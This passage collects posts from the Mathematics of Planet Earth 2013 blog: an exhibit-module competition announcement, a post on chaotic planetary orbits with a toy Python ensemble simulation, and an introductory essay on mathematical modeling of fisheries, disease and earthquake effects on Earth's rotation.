    P.C. England, P. Molnar and F.M. Richter, Kelvin, Perry and the Age of the Earth, American Scientist, Volume 95, 2007.

    Posted in Geophysics | Leave a comment

    Competition to Design Museum-Quality Modules for MPE Exhibit

    Mathematics of Planet Earth 2013 (MPE 2013) invites you to enter a competition to design virtual or physical museum-quality modules for an exhibition on themes related to Mathematics of Planet Earth.

    The winning modules will form the basis of a virtual exhibition that will be hosted through the IMAGINARY Project by the Mathematisches Forschungsinstitut Oberwolfach (MFO), an international research center based in the Black Forest of Germany. The inauguration of the exhibition will take place at the headquarters of UNESCO in Paris, March 5-8, 2013.

    The deadline for submissions is December 20, 2012. Details about the competition can be found here.

    Posted in MPE Exhibit | Leave a comment

    Chaos in the Solar System

    The motion of the inner planets (Mercury, Venus, Earth and Mars) is chaotic. Numerical evidence was given by Jacques Laskar, who showed in 1994 that the orbits of the inner planets exhibited resonances in some periodic motions. Because of the sensitivity to initial conditions, numerical errors grow exponentially, so it is impossible to control the positions of the planets over long periods of time (hundreds of millions of years) using the standard equations of planetary motion. Laskar derived an averaged system of equations and showed that the orbit of Mercury could at some time cross that of Venus.

    Another way to study chaotic systems is to run many simulations in parallel from an ensemble of initial conditions and derive probabilities of future behaviors. The shadowing lemma guarantees that a simulated trajectory started from a nearby initial condition resembles a true trajectory. In 2009, Laskar announced in Nature the results of an ambitious program of 2,000 parallel simulations of the solar system over periods of the order of 5 billion years. The new model of the solar system was much more sophisticated and included some relativistic effects. The simulations showed about a 1% chance that Mercury’s orbit could be destabilized, leading to a collision with the Sun or Venus. A much smaller number of simulations showed that all the inner planets could be destabilized, with a potential collision between the Earth and either Venus or Mars possible in approximately 3.3 billion years.
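
    The ensemble idea can be illustrated with a toy chaotic system; the sketch below uses the logistic map as a pedagogical stand-in, not a solar-system model. Many copies are run from nearly identical initial conditions, and the probability of an event is estimated as the fraction of ensemble members in which it occurs.

        # Toy illustration of ensemble forecasting for a chaotic system.
        # The logistic map at r = 4 is a pedagogical stand-in, not a planetary model.
        import random

        def logistic_trajectory(x0: float, r: float = 4.0, steps: int = 1000) -> float:
            x = x0
            for _ in range(steps):
                x = r * x * (1.0 - x)
            return x

        random.seed(0)
        ensemble_size = 2000
        # Initial conditions differing only at the 1e-8 level.
        initial_conditions = [0.2 + 1e-8 * random.random() for _ in range(ensemble_size)]
        finals = [logistic_trajectory(x0) for x0 in initial_conditions]

        # Probability estimate for the "event" that the final state exceeds 0.9.
        p = sum(1 for x in finals if x > 0.9) / ensemble_size
        print(f"estimated probability of the event after 1000 steps: {p:.3f}")

    Individual trajectories are unpredictable, but the ensemble fraction is a stable, reproducible quantity, which is exactly the kind of statement Laskar’s simulations make about Mercury.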

    Posted in Celestial Mechanics | Leave a comment

    A Blog for MPE2013

    In this, my first contribution to the MPE2013 blog, I am particularly lucky to be able to announce that MPE2013 has received the patronage of UNESCO. This includes, in particular, the international launch of the Mathematics of Planet Earth Open-Source Exhibition, scheduled to take place in February 2013.

    As you can see, we will have an MPE2013 blog. We expect to have occasional contributions in 2012, and we anticipate daily contributions starting January 1, 2013. This testifies to the magnitude of MPE2013.

    Of course, we have not yet planned for 365 bloggers for 2013! We need your help with a contribution. What could be a contribution? It could be a personal commentary on any topic associated with MPE2013: a report on a meeting, a pointer to important research results, a website recommendation, a short essay on a key issue, a book review, a news item, or any other material that might be of interest to a broad audience. A contribution can be as short as a couple of paragraphs and may include a photo or illustration or even an audio or video clip. You may choose your date(s) and topic(s) to blog about your favorite event(s). We understand that last-minute changes are part of the action. To register, send a message to blog@mpe2013.org, with an indication of preferred dates and topics.

    I intend to blog regularly in 2013. I will use the blog to share with you the new developments of MPE2013. But you will also discover that one of my passions is popularization of mathematics. I am a regular contributor to the (French) magazine Accromath. This magazine is preparing a special issue on Mathematics of Planet Earth for the beginning of 2013, and we hope for a wide distribution of this special issue outside the province of Quebec. If you look at the archives of Accromath, you will see that we have highlighted all the articles that are related to MPE topics. If more magazines around the world do the same, then this will allow for significant material that teachers will be able to bring to the classroom.

    I have now been working on MPE2013 for three years, and my main reward in this venture is that I keep discovering new mathematics hidden in some MPE topics, learning about the beautiful mathematics in others, and understanding some of the mathematical challenges in the science of climate and sustainability. There are several important ingredients in good research: one is the significance of the question considered, and another is the power of the tools developed or used to solve it. These can be independent matters. Mathematicians are good problem solvers. They have powerful tools, and they are able to create new tools for new problems. But this is not sufficient. We need to ask the right questions, and we need to use the right models. It can be very tempting to fit a line through a cloud of points, but what if the cloud of points is the beginning of an exponential phenomenon? Linear models can give a good fit with data over short intervals, but are we allowed to extrapolate over longer intervals? When we model a phenomenon, have we forgotten an essential parameter? Can we consider the model in isolation, or is the system influenced by other variables in a larger model? Let me share with you some of the new things I learned recently.

    Daniel Pauly, from the UBC Fisheries Centre, recently gave a public lecture at the Centre de Recherches Mathématiques (CRM) on the state of fisheries in the world. He talked about the decline of the cod population in the Atlantic. There were two contradictory signals: the catches by small boats close to the Eastern Canadian coast were decreasing drastically, but there was no significant decrease in the deep-sea fishing catches. Which signal to follow? The choice was made to ignore the first signal, with the result that there has been almost no cod left in the Atlantic for almost 20 years. We now know that there was no contradiction between the two signals: even when few cod are left, they cluster together over a reduced area, which still allows good catches.

    Last week, I learned from Robert Smith? (sic) about the successful mathematical modeling of the Guinea worm. I was five years old living in Guinea when for the first time I heard the adults explaining the risk of catching this worm, which could be a meter long and would live inside your body, usually your foot. The complicated life cycle of this worm is well known, the disease is now decreasing, and we can dream of eradicating it in the near future. Among the many parameters, the one that proved the most important is education! When one’s foot hurts, it is very tempting to put it in water. It is the moment that the worm chooses to lay 100,000 eggs. Education gives better results than chlorinating the water and the other techniques that have been tried. This example shows that we must keep an open mind when we do research on MPE topics.

    As an inhabitant of the Earth and a curious person, I am always trying to better understand our planet. A year ago, not long after the earthquake in Japan, I received the following message from John McKay: “I am asking whether there will be a session on the effect of earthquakes on the rotation speed of the Earth?” and we started exchanging messages on the matter. I remarked that a change of the rotation speed of the Earth forces many adjustments: recalibrating the telescopes, since the polar axis of the Earth might have changed position, readjusting the GPS, etc. Could this phenomenon be a good topic for a module for the MPE competition? Could it be a starting point for a modeling discussion in your course? The modeling could start with the physical situation: the closer the mass to the center of the Earth, the faster the rotation. Then, how do you orient the axis of the telescope so that only one rotation movement suffices to keep the focus on a star during a long observation period? You need not solve all the problems. Asking questions is also part of the game.
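
    The physical statement that the closer the mass is to the center of the Earth, the faster the rotation, is conservation of angular momentum, $L = I\omega$: if an earthquake reduces the moment of inertia $I$ by a small fraction, the length of day shortens by approximately the same fraction. The fractional change used below is a made-up illustrative value, not a measurement for any particular earthquake.

        # Conservation of angular momentum L = I * omega: if the moment of inertia I
        # decreases by a small fraction delta, the length of day decreases by ~delta * T.
        # The value of delta is illustrative, not a measured quantity.

        T = 86400.0           # length of day, seconds
        delta = 2.0e-11       # hypothetical fractional decrease of the moment of inertia

        change_in_day_seconds = -delta * T
        print(f"change in length of day: {change_in_day_seconds * 1e6:.2f} microseconds")

    Even a tiny rearrangement of mass produces a measurable effect, on the order of microseconds, which is why telescopes and GPS systems need recalibration after a great earthquake.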

    Christiane Rousseau

    Posted in General | Leave a comment
